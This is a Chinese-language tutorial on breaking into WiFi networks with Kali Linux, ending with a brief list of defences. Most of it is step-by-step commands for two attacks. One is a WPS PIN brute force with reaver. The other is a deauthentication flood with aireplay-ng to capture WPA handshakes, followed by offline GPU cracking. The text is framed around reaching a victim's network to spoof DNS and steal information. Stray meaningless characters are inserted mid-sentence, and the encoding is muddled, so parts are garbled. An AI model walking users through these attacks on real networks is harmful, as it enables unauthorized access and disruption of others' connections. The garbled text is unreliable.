在網(wǎng)絡(luò)滲透中,能夠接入被攻擊者的網(wǎng)絡(luò)至關(guān)重要,只要黑客接入你的網(wǎng)絡(luò),利用DNS欺騙,arp攻擊等各種釣魚(yú)技術(shù),基本上就能獲取一切信息,WIFI網(wǎng)絡(luò)的安全性重要性不言而喻!
手機(jī)上有很多類似360免費(fèi)WIFI和WIFI萬(wàn)能鑰匙的軟件,可以"破解"WIFI密碼,實(shí)際上這類軟件不是"破解"而是"偷"密碼,這類軟件在安裝的時(shí)候會(huì)自動(dòng)上傳你家的WIFI密碼,也有可能是你一不小心分享出去的!分享之后別人使用軟件就能連上你家的WIFI了,一般來(lái)說(shuō),商家WIFI比較多.
常見(jiàn)的WIFI破解技術(shù)有2種:
攻擊測(cè)試環(huán)境:kali linux 64位,可以安裝雙系統(tǒng),如果用虛擬機(jī)的話必須要用外置USB網(wǎng)卡!
1.PIN
該技術(shù)主要利用路由器的wps功能的bug,PIN 碼分前4 和后4,先破前4 只有最多一萬(wàn)個(gè)組合,破后4 中的前3 只有一千個(gè)組合苹熏,一共就是一萬(wàn)一千個(gè)密碼組合庶弃。 10 的4 次方+10 的3 次方=11000 個(gè)密碼組合屁擅。當(dāng)reaver 確定前4 位PIN 密碼后缅帘,其任務(wù)進(jìn)度數(shù)值將直接跳躍至90.9%以上衰粹,也就是說(shuō)只剩余一千個(gè)密碼組合了议谷。總共一萬(wàn)一千個(gè)密碼!
主要攻擊工具:reaver,該工具十分強(qiáng)大,有很多配置參數(shù),這里只列出最簡(jiǎn)單的攻擊步驟,僅供參考:
1.airmon-ng start wlan0 #啟動(dòng)網(wǎng)卡的監(jiān)聽(tīng)模式
2.airodump-ng wlan0mon #查看周圍區(qū)域所有WIFI信號(hào)情況
3.reaver -i wlan0mon -b AP_MAC -vv #開(kāi)始pin
4.reaver -i wlan0mon -b AP_Mac -p WPS_PIN #得到pin值獲取密碼
備注:其實(shí)現(xiàn)在很多路由器都關(guān)閉了wps功能,所以沒(méi)法pin,而且很多新的路由器都是防pin!
2.暴力窮盡破解
該技術(shù)理論上只要計(jì)算機(jī)計(jì)算能力夠強(qiáng)大,沒(méi)有什么密碼破解不了!只是時(shí)間長(zhǎng)短的問(wèn)題.先抓握手包然后跑包!
主要工具:aircrack-ng
1.airmon-ng check kill #kill一些無(wú)關(guān)進(jìn)程
2.airmon-ng start wlan0 #開(kāi)啟網(wǎng)卡監(jiān)聽(tīng)模式
3.airodump-ng wlan0mon #查看周圍區(qū)域所有WIFI信號(hào)情況
4.airodump-ng -c 信道 --bssid 目標(biāo)mac -w wep wlan0mon #開(kāi)始抓包
5.airodump-ng -c 信道 --bssid 目標(biāo)mac wlan0mon #查看當(dāng)前環(huán)境的WiFi連接情況
6.aireplay-ng --deauth 10000 -a 目標(biāo)mac -c 客戶端mac wlan0mon #對(duì)連接到目標(biāo)ap的客戶端攻擊,使其掉線,抓取握手包!
備注:抓包的關(guān)鍵是第6步抓取握手包,所謂握手包就是對(duì)方設(shè)備掉線后重新連接WIFI時(shí)候的數(shù)據(jù)包,只要抓到握手包就可以了,拿到握手包后切換到windows系統(tǒng),用EWSA等跑包軟件跑包,跑包速度看機(jī)器配置,主要是看顯卡配置,本人筆記本i7+gt750M,一秒鐘2萬(wàn)次,其實(shí)也看運(yùn)氣,如果是弱密碼,分分鐘鐘的事情,如果是包含字母\標(biāo)點(diǎn)符號(hào)\特殊符號(hào)的密碼......那幾乎不可能!
3.防備措施:
1.不要安裝 xxx免費(fèi)WIFI等軟件,如果不小心把密碼分享出去的話,只能改密碼了!
2.關(guān)閉路由器wps功能.此功能大部分人都用不到
3.隱藏ssid.這樣別人就搜不到你家的WIFI信號(hào)
4.使用復(fù)雜密碼,包含字母\標(biāo)點(diǎn)符號(hào)\特殊符號(hào)!